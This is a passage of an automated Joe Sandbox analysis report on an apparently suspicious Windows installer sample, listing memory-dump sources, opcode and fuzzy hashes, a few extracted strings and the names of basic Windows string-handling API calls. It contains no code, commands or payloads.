                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                  • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                  • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                  • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                  • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                  • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                  • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                  • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q$LR^q$$^q$$^q
                                                  • API String ID: 0-2454687669
                                                  • Opcode ID: 6cf792bd3e2f9c2110863a5df73241b7ceaa5442dfe981156dc78557ed332a36
                                                  • Instruction ID: 73b1de2ee1895b1620200d9b3773a65ce1a61962a4908885cd03aeb422f2ce48
                                                  • Opcode Fuzzy Hash: 6cf792bd3e2f9c2110863a5df73241b7ceaa5442dfe981156dc78557ed332a36
                                                  • Instruction Fuzzy Hash: 2051C0307002019FDB08DB28C995A5AB7F2FF88340F148DB9E915AB395DB30EC45CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: f58c49ca2a4cf9d5aad1d1b68d756bb7221f67485e629a3eac235d3b2daf97c0
                                                  • Instruction ID: 6411d41d90cdf5f7c9b2460794a0c8c134538319cfd135eecab088f7095aae7d
                                                  • Opcode Fuzzy Hash: f58c49ca2a4cf9d5aad1d1b68d756bb7221f67485e629a3eac235d3b2daf97c0
                                                  • Instruction Fuzzy Hash: F951AF78A00204DFEB15DAA4C48269EB7F2EB88351F1089B9D416FB355DB30EC46CF91
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                  • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                  • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9